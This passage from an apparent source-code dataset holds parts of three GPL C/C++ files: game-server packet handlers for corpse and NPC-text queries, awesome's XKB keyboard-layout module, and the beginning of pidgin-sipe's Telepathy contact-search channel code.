                    x = corpseMapEntry->entrance_x;
                    y = corpseMapEntry->entrance_y;
                    z = entranceMap->GetHeight(x, y, MAX_HEIGHT);
                }
            }
        }
    }

    WorldPacket data(MSG_CORPSE_QUERY, 1+(6*4));
    data << uint8(1);                                   // corpse found
    data << int32(mapid);                               // map to show the marker on (possibly the entrance map)
    data << float(x);
    data << float(y);
    data << float(z);
    data << int32(corpsemapid);                         // map the corpse actually lies on
    data << uint32(0);                                  // unknown
    SendPacket(&data);
}
// CMSG_NPC_TEXT_QUERY: send the gossip text for the given text ID.  If
// the ID is unknown a placeholder "Greetings $N" entry is sent for each
// option slot; otherwise the stored options are localized and each
// empty male/female variant falls back to the other.
void WorldSession::HandleNpcTextQueryOpcode(WorldPacket& recvData)
{
    uint32 textID;
    uint64 guid;

    recvData >> textID;
    IC_LOG_DEBUG("network", "WORLD: CMSG_NPC_TEXT_QUERY ID '%u'", textID);

    recvData >> guid;                                   // read but unused

    GossipText const* pGossip = sObjectMgr->GetGossipText(textID);

    WorldPacket data(SMSG_NPC_TEXT_UPDATE, 100);        // guess size
    data << textID;

    if (!pGossip)
    {
        // Unknown text ID: fill every slot with a harmless placeholder.
        for (uint32 i = 0; i < MAX_GOSSIP_TEXT_OPTIONS; ++i)
        {
            data << float(0);
            data << "Greetings $N";
            data << "Greetings $N";
            data << uint32(0);
            data << uint32(0);
            data << uint32(0);
            data << uint32(0);
            data << uint32(0);
            data << uint32(0);
            data << uint32(0);
        }
    }
    else
    {
        std::string Text_0[MAX_LOCALES], Text_1[MAX_LOCALES];
        for (int i = 0; i < MAX_GOSSIP_TEXT_OPTIONS; ++i)
        {
            Text_0[i]=pGossip->Options[i].Text_0;
            Text_1[i]=pGossip->Options[i].Text_1;
        }

        // Overlay localized texts for this session's locale, if any.
        int loc_idx = GetSessionDbLocaleIndex();
        if (loc_idx >= 0)
        {
            if (NpcTextLocale const* nl = sObjectMgr->GetNpcTextLocale(textID))
            {
                for (int i = 0; i < MAX_LOCALES; ++i)
                {
                    ObjectMgr::GetLocaleString(nl->Text_0[i], loc_idx, Text_0[i]);
                    ObjectMgr::GetLocaleString(nl->Text_1[i], loc_idx, Text_1[i]);
                }
            }
        }

        for (int i = 0; i < MAX_GOSSIP_TEXT_OPTIONS; ++i)
        {
            data << pGossip->Options[i].Probability;

            // Each text variant falls back to the other when empty.
            if (Text_0[i].empty())
                data << Text_1[i];
            else
                data << Text_0[i];

            if (Text_1[i].empty())
                data << Text_0[i];
            else
                data << Text_1[i];

            data << pGossip->Options[i].Language;

            for (int j = 0; j < MAX_GOSSIP_TEXT_EMOTES; ++j)
            {
                data << pGossip->Options[i].Emotes[j]._Delay;
                data << pGossip->Options[i].Emotes[j]._Emote;
            }
        }
    }

    SendPacket(&data);

    IC_LOG_DEBUG("network", "WORLD: Sent SMSG_NPC_TEXT_UPDATE");
}
/// Only _static_ data is sent in this packet !!!
// CMSG_PAGE_TEXT_QUERY: send the requested page text and, by following
// the NextPage links, one response packet per page in the chain.
void WorldSession::HandlePageQueryOpcode(WorldPacket& recvData)
{
    IC_LOG_DEBUG("network", "WORLD: Received CMSG_PAGE_TEXT_QUERY");

    uint32 pageID;
    recvData >> pageID;
    recvData.read_skip<uint64>();                       // guid

    while (pageID)
    {
        PageText const* pageText = sObjectMgr->GetPageText(pageID);
                                                        // guess size
        WorldPacket data(SMSG_PAGE_TEXT_QUERY_RESPONSE, 50);
        data << pageID;

        if (!pageText)
        {
            data << "Item page missing.";
            data << uint32(0);                          // no next page
            pageID = 0;                                 // end the chain
        }
        else
        {
            std::string Text = pageText->Text;

            // Locale overlay (local renamed from the misleading
            // "player" -- it is a PageTextLocale record, not a player).
            int loc_idx = GetSessionDbLocaleIndex();
            if (loc_idx >= 0)
                if (PageTextLocale const* pageLocale = sObjectMgr->GetPageTextLocale(pageID))
                    ObjectMgr::GetLocaleString(pageLocale->Text, loc_idx, Text);

            data << Text;
            data << uint32(pageText->NextPage);
            pageID = pageText->NextPage;
        }
        SendPacket(&data);

        IC_LOG_DEBUG("network", "WORLD: Sent SMSG_PAGE_TEXT_QUERY_RESPONSE");
    }
}
/*
void WorldSession::HandleCorpseMapPositionQuery(WorldPacket& recvData)
{
IC_LOG_DEBUG("network", "WORLD: Recv CMSG_CORPSE_MAP_POSITION_QUERY");
uint32 unk;
recvData >> unk;
WorldPacket data(SMSG_CORPSE_MAP_POSITION_QUERY_RESPONSE, 4+4+4+4);
data << float(0);
data << float(0);
data << float(0);
data << float(0);
SendPacket(&data);
}
*/ | gpl-2.0 |
psychon/awesome | xkb.c | 2 | 14482 | /*
* xkb.c - keyboard layout control functions
*
* Copyright © 2015 Aleksey Fedotov <lexa@cfotr.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*
*/
/**
* @module awesome
*/
#include "xkb.h"
#include "globalconf.h"
#include "xwindow.h"
#include "objects/client.h"
#include "common/atoms.h"
#include <xcb/xkb.h>
#include <xkbcommon/xkbcommon.h>
#include <xkbcommon/xkbcommon-x11.h>
/**
* Switch keyboard layout.
*
* @function xkb_set_layout_group
* @tparam integer num keyboard layout number, integer from 0 to 3
*/
int
luaA_xkb_set_layout_group(lua_State *L)
{
    /* NOTE(review): no range check is applied here; values outside the
     * documented 0..3 range are passed to the X server as-is -- confirm
     * whether validation is desired. */
    unsigned group = luaL_checkinteger(L, 1);

    if (!globalconf.have_xkb)
    {
        luaA_warn(L, "XKB not supported");
        return 0;
    }

    /* Lock the requested layout group on the core keyboard device. */
    xcb_xkb_latch_lock_state (globalconf.connection, XCB_XKB_ID_USE_CORE_KBD,
                              0, 0, true, group, 0, 0, 0);
    return 0;
}
/**
* Get current layout number.
*
* @function xkb_get_layout_group
* @treturn integer num Current layout number, integer from 0 to 3.
*/
/* Query the X server for the core keyboard's current layout group and
 * push it as a Lua integer.  Returns the number of Lua results: 1 on
 * success, 0 when XKB is unsupported or the request failed. */
int
luaA_xkb_get_layout_group(lua_State *L)
{
    if (!globalconf.have_xkb)
    {
        luaA_warn(L, "XKB not supported");
        return 0;
    }

    xcb_xkb_get_state_cookie_t state_c;
    state_c = xcb_xkb_get_state_unchecked (globalconf.connection,
                                           XCB_XKB_ID_USE_CORE_KBD);
    xcb_xkb_get_state_reply_t* state_r;
    state_r = xcb_xkb_get_state_reply (globalconf.connection,
                                       state_c, NULL);

    /* A NULL reply means the request failed; the original called
     * free(NULL) here, which is a harmless no-op -- removed. */
    if (!state_r)
        return 0;

    lua_pushinteger(L, state_r->group);
    free(state_r);
    return 1;
}
/**
* Get layout short names.
*
* @function xkb_get_group_names
* @treturn string A string describing the current layout settings,
* e.g.: 'pc+us+de:2+inet(evdev)+group(alt_shift_toggle)+ctrl(nocaps)'
*/
int
luaA_xkb_get_group_names(lua_State *L)
{
    if (!globalconf.have_xkb)
    {
        luaA_warn(L, "XKB not supported");
        return 0;
    }

    /* Ask the server for the symbols-name atom of the core keyboard. */
    xcb_xkb_get_names_cookie_t name_c;
    name_c = xcb_xkb_get_names_unchecked (globalconf.connection,
                                          XCB_XKB_ID_USE_CORE_KBD,
                                          XCB_XKB_NAME_DETAIL_SYMBOLS);
    xcb_xkb_get_names_reply_t* name_r;
    name_r = xcb_xkb_get_names_reply (globalconf.connection, name_c, NULL);

    if (!name_r)
    {
        luaA_warn(L, "Failed to get xkb symbols name");
        return 0;
    }

    /* Unpack the variable-length reply to reach the symbolsName atom. */
    xcb_xkb_get_names_value_list_t name_list;
    void *buffer = xcb_xkb_get_names_value_list(name_r);
    xcb_xkb_get_names_value_list_unpack (
        buffer, name_r->nTypes, name_r->indicators,
        name_r->virtualMods, name_r->groupNames, name_r->nKeys,
        name_r->nKeyAliases, name_r->nRadioGroups, name_r->which,
        &name_list);

    /* Resolve the atom to its string form. */
    xcb_get_atom_name_cookie_t atom_name_c;
    atom_name_c = xcb_get_atom_name_unchecked(globalconf.connection, name_list.symbolsName);
    xcb_get_atom_name_reply_t *atom_name_r;
    atom_name_r = xcb_get_atom_name_reply(globalconf.connection, atom_name_c, NULL);
    if (!atom_name_r) {
        luaA_warn(L, "Failed to get atom symbols name");
        free(name_r);
        return 0;
    }

    /* The atom name is not NUL-terminated; push it with its length. */
    const char *name = xcb_get_atom_name_name(atom_name_r);
    size_t name_len = xcb_get_atom_name_name_length(atom_name_r);
    lua_pushlstring(L, name, name_len);

    free(atom_name_r);
    free(name_r);
    return 1;
}
/*
 * Fill the XKB rules/model/layout/variant/options (RMLVO) names from
 * the _XKB_RULES_NAMES property on the root window.  The property is a
 * sequence of up to five NUL-separated strings, in exactly that order.
 * Returns false if the property is missing or empty; on success the
 * strings stored in *xkb_names are heap-allocated (strndup) and owned
 * by the caller.
 */
static bool
fill_rmlvo_from_root(struct xkb_rule_names *xkb_names)
{
    xcb_get_property_reply_t *prop_reply = xcb_get_property_reply(globalconf.connection,
        xcb_get_property_unchecked(globalconf.connection, false, globalconf.screen->root, _XKB_RULES_NAMES, XCB_GET_PROPERTY_TYPE_ANY, 0, UINT_MAX),
        NULL);

    if (!prop_reply)
        return false;

    if (prop_reply->value_len == 0)
    {
        p_delete(&prop_reply);
        return false;
    }

    /* Walk the NUL-separated strings; i selects the RMLVO slot. */
    const char *walk = (const char *) xcb_get_property_value(prop_reply);
    unsigned int remaining = xcb_get_property_value_length(prop_reply);
    for (int i = 0; i < 5 && remaining > 0; i++)
    {
        const int len = strnlen(walk, remaining);
        switch (i) {
        case 0:
            xkb_names->rules = strndup(walk, len);
            break;
        case 1:
            xkb_names->model = strndup(walk, len);
            break;
        case 2:
            xkb_names->layout = strndup(walk, len);
            break;
        case 3:
            xkb_names->variant = strndup(walk, len);
            break;
        case 4:
            xkb_names->options = strndup(walk, len);
            break;
        }

        remaining -= len + 1;
        walk = &walk[len + 1];
    }

    p_delete(&prop_reply);
    return true;
}
/** Fill globalconf.xkb_state based on connection and context.
 * With XKB support, the keymap and state are built from the core
 * keyboard device; otherwise a keymap is compiled from the RMLVO names
 * found in _XKB_RULES_NAMES (or libxkbcommon defaults).
 */
static void
xkb_fill_state(void)
{
    xcb_connection_t *conn = globalconf.connection;
    int32_t device_id = -1;

    if (globalconf.have_xkb)
    {
        device_id = xkb_x11_get_core_keyboard_device_id(conn);
        if (device_id == -1)
            warn("Failed while getting XKB device id");
    }
    if (device_id != -1)
    {
        /* Normal path: keymap and state come from the device itself. */
        struct xkb_keymap *xkb_keymap = xkb_x11_keymap_new_from_device(
            globalconf.xkb_ctx,
            conn,
            device_id,
            XKB_KEYMAP_COMPILE_NO_FLAGS);

        if (!xkb_keymap)
            fatal("Failed while getting XKB keymap from device");

        globalconf.xkb_state = xkb_x11_state_new_from_device(xkb_keymap,
                                                             conn,
                                                             device_id);
        if (!globalconf.xkb_state)
            fatal("Failed while getting XKB state from device");

        /* xkb_keymap is no longer referenced directly; decreasing refcount */
        xkb_keymap_unref(xkb_keymap);
    }
    else
    {
        /* Fallback: compile from the root-window RMLVO property. */
        struct xkb_rule_names names = { NULL, NULL, NULL, NULL, NULL };

        if (!fill_rmlvo_from_root(&names))
            warn("Could not get _XKB_RULES_NAMES from root window, falling back to defaults.");

        struct xkb_keymap *xkb_keymap = xkb_keymap_new_from_names(globalconf.xkb_ctx, &names, 0);
        globalconf.xkb_state = xkb_state_new(xkb_keymap);
        if (!globalconf.xkb_state)
            fatal("Failed while creating XKB state");

        /* xkb_keymap is no longer referenced directly; decreasing refcount */
        xkb_keymap_unref(xkb_keymap);

        /* fill_rmlvo_from_root() transferred ownership of the strings. */
        p_delete(&names.rules);
        p_delete(&names.model);
        p_delete(&names.layout);
        p_delete(&names.variant);
        p_delete(&names.options);
    }
}
/** Loads xkb context, state and keymap to globalconf.
 * These variables should be freed by xkb_free_keymap() afterwards.
 */
static void
xkb_init_keymap(void)
{
    globalconf.xkb_ctx = xkb_context_new(XKB_CONTEXT_NO_FLAGS);
    if (!globalconf.xkb_ctx)
        fatal("Failed while getting XKB context");

    /* Builds globalconf.xkb_state (and the keymap behind it). */
    xkb_fill_state();
}
/** Frees xkb context, state and keymap from globalconf.
 * This should be used when these variables will not be used anymore.
 */
static void
xkb_free_keymap(void)
{
    /* Both unref calls tolerate the stored pointers being valid refs
     * created by xkb_init_keymap()/xkb_fill_state(). */
    xkb_state_unref(globalconf.xkb_state);
    xkb_context_unref(globalconf.xkb_ctx);
}
/** Rereads the state of keyboard from X.
 * This call should be used after receiving NewKeyboardNotify or MapNotify,
 * as written in http://xkbcommon.org/doc/current/group__x11.html
 */
static void
xkb_reload_keymap(void)
{
    assert(globalconf.have_xkb);
    /* Replace the cached xkbcommon state with a fresh one. */
    xkb_state_unref(globalconf.xkb_state);
    xkb_fill_state();

    /* Free and then allocate the key symbols */
    xcb_key_symbols_free(globalconf.keysyms);
    globalconf.keysyms = xcb_key_symbols_alloc(globalconf.connection);

    /* Regrab key bindings on the root window */
    xcb_screen_t *s = globalconf.screen;
    xwindow_grabkeys(s->root, &globalconf.keys);

    /* Regrab key bindings on clients */
    foreach(_c, globalconf.clients)
    {
        client_t *c = *_c;

        xwindow_grabkeys(c->window, &c->keys);
        if (c->nofocus_window)
            xwindow_grabkeys(c->nofocus_window, &c->keys);
    }
}
/* Idle callback: perform the work batched by xkb_schedule_refresh() --
 * reload the keymap if requested, then emit the global xkb:: signals.
 * The three work flags are cleared only after the signal handlers ran. */
static gboolean
xkb_refresh(gpointer unused)
{
    lua_State *L = globalconf_get_lua_State();

    globalconf.xkb_update_pending = false;
    if (globalconf.xkb_reload_keymap)
        xkb_reload_keymap();
    if (globalconf.xkb_map_changed)
        signal_object_emit(L, &global_signals, "xkb::map_changed", 0);
    if (globalconf.xkb_group_changed)
        signal_object_emit(L, &global_signals, "xkb::group_changed", 0);

    globalconf.xkb_reload_keymap = false;
    globalconf.xkb_map_changed = false;
    globalconf.xkb_group_changed = false;

    /* One-shot idle source. */
    return G_SOURCE_REMOVE;
}
/* Queue a low-priority idle-time refresh; multiple calls before the
 * refresh runs are coalesced into a single xkb_refresh() invocation. */
static void
xkb_schedule_refresh(void)
{
    if (!globalconf.xkb_update_pending)
    {
        globalconf.xkb_update_pending = true;
        g_idle_add_full(G_PRIORITY_LOW, xkb_refresh, NULL, NULL);
    }
}
/** The xkb notify event handler.
 * Marks the appropriate work flags and schedules an idle refresh; the
 * only immediate side effect is updating the xkbcommon state mask on
 * STATE_NOTIFY.
 * \param event The event.
 */
void
event_handle_xkb_notify(xcb_generic_event_t* event)
{
    assert(globalconf.have_xkb);
    /* The pad0 field of xcb_generic_event_t contains the event sub-type,
     * unfortunately xkb doesn't provide a usable struct for getting this in a
     * nicer way*/
    switch (event->pad0)
    {
      case XCB_XKB_NEW_KEYBOARD_NOTIFY:
      {
          xcb_xkb_new_keyboard_notify_event_t *new_keyboard_event = (void*)event;

          globalconf.xkb_reload_keymap = true;

          /* Only a keycode change implies the Lua-visible map changed. */
          if (new_keyboard_event->changed & XCB_XKB_NKN_DETAIL_KEYCODES)
              globalconf.xkb_map_changed = true;

          xkb_schedule_refresh();
          break;
      }
      case XCB_XKB_MAP_NOTIFY:
      {
          globalconf.xkb_reload_keymap = true;
          globalconf.xkb_map_changed = true;

          xkb_schedule_refresh();
          break;
      }
      case XCB_XKB_STATE_NOTIFY:
      {
          xcb_xkb_state_notify_event_t *state_notify_event = (void*)event;

          /* Keep the cached xkbcommon state in sync with the server. */
          xkb_state_update_mask(globalconf.xkb_state,
                                state_notify_event->baseMods,
                                state_notify_event->latchedMods,
                                state_notify_event->lockedMods,
                                state_notify_event->baseGroup,
                                state_notify_event->latchedGroup,
                                state_notify_event->lockedGroup);

          if (state_notify_event->changed & XCB_XKB_STATE_PART_GROUP_STATE)
          {
              globalconf.xkb_group_changed = true;
              xkb_schedule_refresh();
          }

          break;
      }
    }
}
/** Initialize XKB support.
 * Sets up the XKB extension (if available), subscribes to the XKB
 * events awesome cares about, enables detectable auto-repeat, and loads
 * the initial keymap.  This call allocates resources that should be
 * freed by calling xkb_free().
 */
void
xkb_init(void)
{
    globalconf.xkb_update_pending = false;
    globalconf.xkb_reload_keymap = false;
    globalconf.xkb_map_changed = false;
    globalconf.xkb_group_changed = false;

    int success_xkb = xkb_x11_setup_xkb_extension(globalconf.connection,
                                                  XKB_X11_MIN_MAJOR_XKB_VERSION,
                                                  XKB_X11_MIN_MINOR_XKB_VERSION,
                                                  0,
                                                  NULL,
                                                  NULL,
                                                  NULL,
                                                  NULL);
    globalconf.have_xkb = success_xkb;
    if (!success_xkb) {
        /* Even without XKB, a keymap is still loaded (via the
         * _XKB_RULES_NAMES fallback in xkb_fill_state()). */
        warn("XKB not found or not supported");
        xkb_init_keymap();
        return;
    }

    uint16_t map = XCB_XKB_EVENT_TYPE_STATE_NOTIFY | XCB_XKB_EVENT_TYPE_MAP_NOTIFY | XCB_XKB_EVENT_TYPE_NEW_KEYBOARD_NOTIFY;

    //
    // These maps are provided to allow key remapping,
    // that could be used in awesome
    //
    uint16_t map_parts = XCB_XKB_MAP_PART_KEY_TYPES |
                         XCB_XKB_MAP_PART_KEY_SYMS |
                         XCB_XKB_MAP_PART_MODIFIER_MAP |
                         XCB_XKB_MAP_PART_EXPLICIT_COMPONENTS |
                         XCB_XKB_MAP_PART_KEY_ACTIONS |
                         XCB_XKB_MAP_PART_KEY_BEHAVIORS |
                         XCB_XKB_MAP_PART_VIRTUAL_MODS |
                         XCB_XKB_MAP_PART_VIRTUAL_MOD_MAP;

    /* Enable detectable auto-repeat, but ignore failures */
    xcb_discard_reply(globalconf.connection,
        xcb_xkb_per_client_flags(globalconf.connection,
                                 XCB_XKB_ID_USE_CORE_KBD,
                                 XCB_XKB_PER_CLIENT_FLAG_DETECTABLE_AUTO_REPEAT,
                                 XCB_XKB_PER_CLIENT_FLAG_DETECTABLE_AUTO_REPEAT,
                                 0,
                                 0,
                                 0)
        .sequence);

    xcb_xkb_select_events(globalconf.connection,
                          XCB_XKB_ID_USE_CORE_KBD,
                          map,
                          0,
                          map,
                          map_parts,
                          map_parts,
                          0);

    /* load keymap to use when resolving keypresses */
    xkb_init_keymap();
}
/** Frees resources allocated by xkb_init().
 * Unsubscribes from XKB events (when the extension was available) and
 * releases the keymap/state/context.
 */
void
xkb_free(void)
{
    /* Braces added: the original brace-less multi-line if made it look
     * as though xkb_free_keymap() might be conditional. */
    if (globalconf.have_xkb)
    {
        /* Unsubscribe from all XKB events. */
        xcb_xkb_select_events(globalconf.connection,
                              XCB_XKB_ID_USE_CORE_KBD,
                              0,
                              0,
                              0,
                              0,
                              0,
                              0);
    }

    /* The keymap/state/context are created even without XKB support
     * (xkb_init() calls xkb_init_keymap() on the failure path too), so
     * always release them. */
    xkb_free_keymap();
}
// vim: filetype=c:expandtab:shiftwidth=4:tabstop=8:softtabstop=4:textwidth=80
| gpl-2.0 |
mooninite/sipe | src/telepathy/telepathy-search.c | 2 | 19149 | /**
* @file telepathy-search.c
*
* pidgin-sipe
*
* Copyright (C) 2012-2014 SIPE Project <http://sipe.sourceforge.net/>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include <string.h>
#include <glib-object.h>
#include <telepathy-glib/svc-channel.h>
#include <telepathy-glib/telepathy-glib.h>
#include "sipe-backend.h"
#include "sipe-common.h"
#include "sipe-core.h"
#include "telepathy-private.h"
/* vCard/Telepathy search field names */
#define SIPE_TELEPATHY_SEARCH_KEY_FIRST "x-n-given"
#define SIPE_TELEPATHY_SEARCH_KEY_LAST "x-n-family"
#define SIPE_TELEPATHY_SEARCH_KEY_EMAIL "email"
#define SIPE_TELEPATHY_SEARCH_KEY_COMPANY "x-org-name"
#define SIPE_TELEPATHY_SEARCH_KEY_COUNTRY "x-adr-country"
#define SIPE_TELEPATHY_SEARCH_KEY_FULLNAME "fn"
#define SIPE_TELEPATHY_SEARCH_KEY_BLOB "" /* one big search box */
G_BEGIN_DECLS
/*
* Search Manager class - data structures
*/
typedef struct _SipeSearchManagerClass {
GObjectClass parent_class;
} SipeSearchManagerClass;
typedef struct _SipeSearchManager {
GObject parent;
GObject *connection;
GHashTable *channels;
} SipeSearchManager;
/*
* Search Manager class - type macros
*/
/* telepathy-private.h: #define SIPE_TYPE_SEARCH_MANAGER ... */
#define SIPE_SEARCH_MANAGER(obj) \
(G_TYPE_CHECK_INSTANCE_CAST((obj), SIPE_TYPE_SEARCH_MANAGER, \
SipeSearchManager))
/*
* Search Channel class - data structures
*/
typedef struct _SipeSearchChannelClass {
TpBaseChannelClass parent_class;
} SipeSearchChannelClass;
typedef struct _SipeSearchChannel {
TpBaseChannel parent;
GObject *connection;
GHashTable *results;
TpChannelContactSearchState state;
} SipeSearchChannel;
/*
* Search Channel class - type macros
*/
static GType sipe_search_channel_get_type(void) G_GNUC_CONST;
#define SIPE_TYPE_SEARCH_CHANNEL \
(sipe_search_channel_get_type())
#define SIPE_SEARCH_CHANNEL(obj) \
(G_TYPE_CHECK_INSTANCE_CAST((obj), SIPE_TYPE_SEARCH_CHANNEL, \
SipeSearchChannel))
G_END_DECLS
/*
* Search Manager class - type definition
*/
static void channel_manager_iface_init(gpointer, gpointer);
G_DEFINE_TYPE_WITH_CODE(SipeSearchManager,
sipe_search_manager,
G_TYPE_OBJECT,
G_IMPLEMENT_INTERFACE(TP_TYPE_CHANNEL_MANAGER,
channel_manager_iface_init);
)
/*
* Search Manager class - type definition
*/
static void contact_search_iface_init(gpointer, gpointer);
G_DEFINE_TYPE_WITH_CODE(SipeSearchChannel,
sipe_search_channel,
TP_TYPE_BASE_CHANNEL,
G_IMPLEMENT_INTERFACE(TP_TYPE_SVC_CHANNEL_TYPE_CONTACT_SEARCH,
contact_search_iface_init);
)
/*
* Search Manager class - instance methods
*/
/* GObject "constructed": chain up first, then create the (empty) table
 * used as a set of the live search channels owned by this manager. */
static void sipe_search_manager_constructed(GObject *object)
{
	SipeSearchManager *self = SIPE_SEARCH_MANAGER(object);
	void (*chain_up)(GObject *) = G_OBJECT_CLASS(sipe_search_manager_parent_class)->constructed;

	if (chain_up)
		chain_up(object);

	/* keys are channel pointers; no value/destroy functions needed */
	self->channels = g_hash_table_new(g_direct_hash, g_direct_equal);
}
/* GObject "dispose": release the channel table and the connection
 * reference, then chain up to the parent class. */
static void sipe_search_manager_dispose(GObject *object)
{
	SipeSearchManager *self = SIPE_SEARCH_MANAGER(object);
	/* BUG FIX: must chain up via the parent's dispose handler; the
	 * original mistakenly fetched ->constructed here, re-running
	 * construction logic during teardown and skipping the parent's
	 * dispose entirely. */
	void (*chain_up)(GObject *) = G_OBJECT_CLASS(sipe_search_manager_parent_class)->dispose;

	tp_clear_pointer(&self->channels, g_hash_table_unref);
	tp_clear_object(&self->connection);

	if (chain_up)
		chain_up(object);
}
/*
* Search Manager class - type implementation
*/
/* Class initializer: install the constructed/dispose overrides. */
static void sipe_search_manager_class_init(SipeSearchManagerClass *klass)
{
	GObjectClass *object_class = G_OBJECT_CLASS(klass);

	SIPE_DEBUG_INFO_NOFORMAT("SipeSearchManager::class_init");

	object_class->constructed  = sipe_search_manager_constructed;
	object_class->dispose      = sipe_search_manager_dispose;
}
/* Instance initializer: nothing to do; real setup is in constructed. */
static void sipe_search_manager_init(SIPE_UNUSED_PARAMETER SipeSearchManager *self)
{
	SIPE_DEBUG_INFO_NOFORMAT("SipeSearchManager::init");
}
/*
* Search Manager class - interface implementation
*
* Channel Manager
*/
/* TpChannelManager::foreach_channel -- invoke @func on every live
 * search channel owned by this manager. */
static void foreach_channel(TpChannelManager *manager,
			    TpExportableChannelFunc func,
			    gpointer user_data)
{
	SipeSearchManager *self = SIPE_SEARCH_MANAGER(manager);
	GHashTableIter iter;
	gpointer chan;

	SIPE_DEBUG_INFO_NOFORMAT("SipeSearchManager::foreach_channel");

	/* self->channels is used as a set: keys are channel objects. */
	g_hash_table_iter_init(&iter, self->channels);
	while (g_hash_table_iter_next(&iter, &chan, NULL))
		func(chan, user_data);
}
/* TpChannelManager::type_foreach_channel_class -- advertise the single
 * channel class supported here: ChannelType == ContactSearch with no
 * additional allowed properties. */
static void type_foreach_channel_class(GType type,
				       TpChannelManagerTypeChannelClassFunc func,
				       gpointer user_data)
{
	static const gchar *const no_props[] = {
		NULL
	};
	GHashTable *table = g_hash_table_new_full(g_str_hash, g_str_equal,
						  NULL,
						  (GDestroyNotify) tp_g_value_slice_free);

	SIPE_DEBUG_INFO_NOFORMAT("SipeSearchManager::type_foreach_channel_class");

	g_hash_table_insert(table,
			    TP_IFACE_CHANNEL ".ChannelType",
			    tp_g_value_slice_new_string(TP_IFACE_CHANNEL_TYPE_CONTACT_SEARCH));

	func(type, table, no_props, user_data);
	g_hash_table_unref(table);
}
/* "closed" signal handler: announce the closure to the channel
 * manager machinery and forget the channel. */
static void search_channel_closed_cb(SipeSearchChannel *channel,
				     SipeSearchManager *self)
{
	/* fixed: message used to say "search_channel_close_cb" (missing
	 * 'd'), which didn't match this function's name in log greps */
	SIPE_DEBUG_INFO("SipeSearchManager::search_channel_closed_cb: %p", channel);

	tp_channel_manager_emit_channel_closed_for_object(self,
							  (TpExportableChannel *) channel);
	/* the table holds no reference of its own (plain key, NULL value) */
	g_hash_table_remove(self->channels, channel);
}
/* forward declaration: the channel constructor lives further down */
static GObject *search_channel_new(GObject *connection);

/*
 * TpChannelManager::create_channel implementation.
 *
 * Returns FALSE when the request is not for a ContactSearch channel
 * (so other channel managers get a chance); otherwise creates a new
 * search channel, tracks it, announces it, and returns TRUE.
 */
static gboolean create_channel(TpChannelManager *manager,
			       gpointer request_token,
			       GHashTable *request_properties)
{
	SipeSearchManager *self = SIPE_SEARCH_MANAGER(manager);
	GObject *channel;
	GSList *request_tokens;

	SIPE_DEBUG_INFO_NOFORMAT("SipeSearchManager::create_channel");

	/* not our channel type? -> decline the request */
	if (tp_strdiff(tp_asv_get_string(request_properties,
					 TP_IFACE_CHANNEL ".ChannelType"),
		       TP_IFACE_CHANNEL_TYPE_CONTACT_SEARCH))
		return(FALSE);

	/* create new search channel */
	channel = search_channel_new(self->connection);
	/* track it (key only; removed again in search_channel_closed_cb) */
	g_hash_table_insert(self->channels, channel, NULL);
	g_signal_connect(channel,
			 "closed",
			 (GCallback) search_channel_closed_cb,
			 self);

	/* publish new channel */
	request_tokens = g_slist_prepend(NULL, request_token);
	tp_channel_manager_emit_new_channel(self,
					    TP_EXPORTABLE_CHANNEL(channel),
					    request_tokens);
	g_slist_free(request_tokens);

	return(TRUE);
}
/* Fill in the TpChannelManager vtable (written out directly instead
 * of via the usual IMPLEMENT() macro). */
static void channel_manager_iface_init(gpointer g_iface,
				       SIPE_UNUSED_PARAMETER gpointer iface_data)
{
	TpChannelManagerIface *iface = g_iface;

	iface->foreach_channel            = foreach_channel;
	iface->type_foreach_channel_class = type_foreach_channel_class;
	iface->create_channel             = create_channel;
	/* requests are served exactly like creations */
	iface->request_channel            = create_channel;
	/* Ensuring these channels doesn't really make much sense. */
	iface->ensure_channel             = NULL;
}
/* create new search manager object */
/* create new search manager object */
GObject *sipe_telepathy_search_new(TpBaseConnection *connection)
{
	SipeSearchManager *manager;

	manager = g_object_new(SIPE_TYPE_SEARCH_MANAGER, NULL);
	/* the manager keeps its own reference to the connection */
	manager->connection = g_object_ref(connection);

	return(G_OBJECT(manager));
}
/*
* Search Channel class - instance methods
*/
enum {
CHANNEL_PROP_SEARCH_KEYS = 1,
CHANNEL_LAST_PROP
};
/*
 * GObject::get_property for the search channel; the only exported
 * property is the list of search keys search_channel_search() accepts.
 */
static void get_property(GObject *object,
			 guint property_id,
			 GValue *value,
			 GParamSpec *pspec)
{
	switch (property_id)
	{
	case CHANNEL_PROP_SEARCH_KEYS: {
		/* vCard/Telepathy search field names.
		 *
		 * fixed: was "const gchar const *" - a duplicated
		 * qualifier on the characters. Intended (and matching
		 * no_props[] above) is an array of const pointers to
		 * const strings. */
		static const gchar *const search_keys[] = {
			SIPE_TELEPATHY_SEARCH_KEY_FIRST,
			SIPE_TELEPATHY_SEARCH_KEY_LAST,
			SIPE_TELEPATHY_SEARCH_KEY_EMAIL,
			SIPE_TELEPATHY_SEARCH_KEY_COMPANY,
			SIPE_TELEPATHY_SEARCH_KEY_COUNTRY,
			SIPE_TELEPATHY_SEARCH_KEY_FULLNAME,
			SIPE_TELEPATHY_SEARCH_KEY_BLOB,
			NULL
		};
		/* G_TYPE_STRV: g_value_set_boxed() copies the array */
		g_value_set_boxed(value, search_keys);
	}
		break;
	default:
		G_OBJECT_WARN_INVALID_PROPERTY_ID(object, property_id, pspec);
		break;
	}
}
/* TpBaseChannel::fill_immutable_properties: add our ContactSearch
 * specific property on top of the base class' set. */
static void fill_immutable_properties(TpBaseChannel *channel,
				      GHashTable *properties)
{
	TpBaseChannelClass *parent = TP_BASE_CHANNEL_CLASS(sipe_search_channel_parent_class);

